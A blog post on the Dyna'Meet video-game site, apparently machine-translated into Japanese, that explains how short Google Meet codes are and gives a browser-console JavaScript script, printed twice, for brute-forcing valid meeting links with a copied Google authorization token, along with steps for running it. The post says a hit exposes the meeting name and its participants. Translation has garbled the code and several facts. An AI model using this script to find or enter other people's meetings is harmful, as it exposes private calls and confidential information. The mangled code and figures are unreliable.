Visio- Google Meetで立ち往生してください| Dyrk、Dyna Meet -Visio
Visioに会います
Contents
ランダム化=()=> dico = dico.スプリット (”).マップ(value =>(< value, sort: Math.random() >))).呪文((a、b)=> a.呪文 – b.スペル).マップ((()< value >)=>値).参加する (”),
newpatternkey =()=> “xxx-xxxx-xxx”.スプリット (”).マップ(c => c == ‘ – ‘?C:文字列.From Charcode(数学.フロア(数学.ランダム()*25)+97)).参加する (”),
key = newpatternkey()、counter = 20;
next =()=> key.スプリット (”).マップ(e => e == ‘ – ‘ ? E:dico [dico.indexof(e) + 1> = dico.長さ ? 0:DICO.indexof(e) + 1]).参加する (”),
カウンター= 0;
meetlink = ‘https:// meet.グーグル.com/’、利用可能なtoe =()=> xhr = new xmlhttprequest();
if(counter ++> = 20)counter = 0;
key = newpatternkey();
ランダム化();
>
key = next();
XHR.open( ‘get’、meetlink + key);
XHR.addeventlisner( ‘load’、(e)=> fetch(meetlink).concat( “/$ rpc/google.RTC.会議.V1.MeetingsSpacesService/ResolveMeetingspace “)、” Headers “:” Authorization “:承認,
「コンテンツタイプ」:「Application/X-Protobuf」,
「x-goog-adep-key」:e.目標.責任.match(/\ [“https \:\/\/meet \.グーグル\.com \ “\、”([a-za-z0-9 \ _ \ – ]) “\]/)[1],
「x-goog-authuse」:「0」,
「x-goog-encode-réspose-if-executable」:「base64」,
“x-goog-meeting-identifier”:btoa( ‘\ b \ x02 \ x12 \ f’.concat(key)),
>,
「ボディ」:「\ n \ f」.concat(key、 “0 \ u0001″),
「方法」:「投稿」
>).次に(e => e.文章 ())
.次に(e => setimeout(利用可能、100);
コンソール.log(meetlink.concat(key).BeautifyDisplay(38)、(e.交換(/[^a-za-z0-9]/g、 “”)+””).BeautifyDisplay(38));
>);
>);
XHR.送信 ();
>;
弦.プロトタイプ.beautifydisplay = function(size) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >サイズ ? TXT.長さ:サイズ)).substr(0、size).concat( ‘|’); >,
コンソール.クリア ();
利用可能 ();
>)()
dyrk
現在、サイバーセキュリティの分野で働いている私は、かなり些細な状況に定期的に直面しています.
最新のこと、会議中の人の侵入 .
幸いなことに、安全のために、Google Meetには、人がビデオ会議に参加しようとするだけでなく、それを受け入れるか拒否することを参加者に警告できる機能が含まれています。.
しかし、このイベントは私に多くの質問をするようになります .
Google Meetリンクの複雑さ
まず第一に、人がそれに招待されずにミートリンクに接続することはどのように可能ですか ?
リンクの単純さを考慮する必要があります:https:// google.会う.com/xxx -yyyy -zzzz
xxx -yyyy -zzzz AとZの間のアルファベット文字のみです。つまり、各文字の27の可能な組み合わせです.
数学者にとって、したがって:
27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27可能な組み合わせ .
Google Meetリンクの寿命
「Google Meet」会議の債券のリンクがどのように構築されているかをよりよく理解することができますが、考慮すべき非常に重要な側面があります . Google Meetリンクの寿命 !
確かに、誰もが数回クリックしてGoogleミーティングミーティングを生成できます.
しかし、数日、数週間、または数ヶ月後 . リンクはもはや有効ではありません.
したがって、生成されたリンクには一定の期間の有効性があります .
例外は「繰り返し」イベントを作成します、そして、これはそれが興味深いものになる場所です.
ビジネスでは、定期的に組織する機会がたくさんあります(チーム /ビジネス、毎日、毎週、毎月、, . ))).
従業員がアジェンダでこのタイプのイベントを生成すると、Google Meetリンクが自動的に生成されます. これは不変です.
したがって、このイベントには毎回同じリンクがあります.
少しjavascriptとブルートフォースを備えています ?
これらすべての要素を使用して、私たちは現在、すべての可能性を一掃し、Videoconociatesへのリンクを検出するための高い確率に到達するために装備されています !
だから私はGoogle Meetの操作を少しレトロ保険にして、無限の数の組み合わせを試すJavaScriptコードを書く
(c)dyrk.ORG 2023-2024-ミートのルーレット
(1)https:// Googleでこのスクリプトを実行する.会う.com
(2)Googleの「XHRリクエスト」ヘッダーに有効な承認のトークンを使用して、承認の変数を見つけて更新します
許可= “Sapisidhash xxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxx“、dico =” abcdefghijklmnopqrstuvxz “,
ランダム化=()=> dico = dico.スプリット (”).マップ(value =>(< value, sort: Math.random() >))).呪文((a、b)=> a.呪文 – b.スペル).マップ((()< value >)=>値).参加する (”),
newpatternkey =()=> “xxx-xxxx-xxx”.スプリット (”).マップ(c => c == ‘ – ‘?C:文字列.From Charcode(数学.フロア(数学.ランダム()*25)+97)).参加する (”),
key = newpatternkey()、counter = 20;
next =()=> key.スプリット (”).マップ(e => e == ‘ – ‘ ? E:dico [dico.indexof(e) + 1> = dico.長さ ? 0:DICO.indexof(e) + 1]).参加する (”),
カウンター= 0;
meetlink = ‘https:// meet.グーグル.com/’、利用可能なtoe =()=> xhr = new xmlhttprequest();
if(counter ++> = 20)counter = 0;
key = newpatternkey();
ランダム化();
>
key = next();
XHR.open( ‘get’、meetlink + key);
XHR.addeventlisner( ‘load’、(e)=> fetch(meetlink).concat( “/$ rpc/google.RTC.会議.V1.MeetingsSpacesService/ResolveMeetingspace “)、” Headers “:” Authorization “:承認,
「コンテンツタイプ」:「Application/X-Protobuf」,
「x-goog-adep-key」:e.目標.責任.match(/\ [“https \:\/\/meet \.グーグル\.com \ “\、”([a-za-z0-9 \ _ \ – ]) “\]/)[1],
「x-goog-authuse」:「0」,
「x-goog-encode-réspose-if-executable」:「base64」,
“x-goog-meeting-identifier”:btoa( ‘\ b \ x02 \ x12 \ f’.concat(key)),
>,
「ボディ」:「\ n \ f」.concat(key、 “0 \ u0001″),
「方法」:「投稿」
>).次に(e => e.文章 ())
.次に(e =>
SettimeOut(利用可能、100);
コンソール.log(meetlink.concat(key).BeautifyDisplay(38)、(e.交換(/[^a-za-z0-9]/g、 “”)+””).BeautifyDisplay(38));
>);
>);
XHR.送信 ();
>;
弦.プロトタイプ.beautifydisplay = function(size) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >サイズ ? TXT.長さ:サイズ)).substr(0、size).concat( ‘|’); >,
コンソール.クリア ();
利用可能 ();
>)()
これらすべてを操作するには、必要になります。
- ページを開きます https:// meet.グーグル.com
- 開発者コンソールを開きます
- [ネットワーク]タブで、fetch / xhrをフィルタリングし、トークンのトークンを回復します「承認」
- 上のソースコードをコピーして貼り付けて、トークンを示した場所に置かれます.
- キーボードの「入り口」キーで検証します.
「承認」トークンの回復:
好奇心が強い人にとって、これはこのスクリプトの結果の結果がどのように見えるかです.
したがって、ビデオ会議のためのスペースが存在しないことを知らせる行に注意してください.
そして、会議のトークンを私たちに掲げた他の人たち ! したがって、リンクが有効であることを示します;)
ただし、ミートリンクで数秒で落ちるとは思わないでください^^
(あなたが少し幸運な男でない限り)
あなたはそれを少なくとも30分間走らせるために大きな忍耐である必要があります.
結論
有効なGoogleミートリンクを見つけるために多くの運があることをパニックにしないでくださいロトを獲得するよりも.
注意 ! 接続する必要なく、特定の情報への有効な会合リンクアクセスに出くわす人:
会議の名前(したがって、機密情報の滑りを避けない)と接続された参加者(すべてまたはゲーム).
Visioに会います
オンライン強盗
同時に最大1000人のプレイヤー
Visioの簡単なアクセスプラットフォーム
Horizon 2024
同時に最大1000人のプレイヤー
Visioの簡単なアクセスプラットフォーム
チャーリーはどこですか ?!
同時に最大1000人のプレイヤー
Visioの簡単なアクセスプラットフォーム
エニグマミッション
同時に最大1000人のプレイヤー
Visioの簡単なアクセスプラットフォーム
サイバーセキュリティの認識
同時に最大5000人のプレイヤー
Visioの簡単なアクセスプラットフォーム
クリスマスを保存します !
同時に最大1000人のプレイヤー
Visioの簡単なアクセスプラットフォーム
Copyright©2023 -Dyna’meet
Cookieの同意を管理します
最高のエクスペリエンスを提供するために、Cookieなどのテクノロジーを使用して、デバイスの情報を保存および/またはアクセスします. これらのテクノロジーに同意すると、このサイトのナビゲーション動作や一意のIDなどのデータを処理できます。. 同意に同意しないか撤回しないという事実は、特定の特性と機能に悪影響を与える可能性があります.
機能的な機能は常にアクティブになります
サブスクライバーまたはユーザーが明示的に要求した特定のサービスの使用を許可するために、または電子通信ネットワーク上の通信の送信を送信するという唯一の目的のために、正当な利益の最後にストレージまたは技術的アクセスが厳密に必要です.
好みの好み
正当な利益を目的として、サブスクライバーまたはサービスを使用している人から要求されていない設定を保存するために、正当な利益を目的とするために、ストレージまたは技術的アクセスが必要です.
統計統計
統計目的でのみ使用されるストレージまたは技術アクセス. 匿名の統計的目的でのみ使用されるストレージまたは技術アクセス. 召喚状がない場合、インターネットアクセスプロバイダーの自主コンプライアンス、または第三者からの追加レコードがない場合、この端に保存または抽出された情報は、一般的にあなたを識別するために使用することはできません.
広告を送信するためにユーザープロファイルを作成したり、ウェブサイトまたは同様のマーケティング目的のあるいくつかのWebサイトでユーザーをフォローするために、ストレージまたは技術的なアクセスが必要です.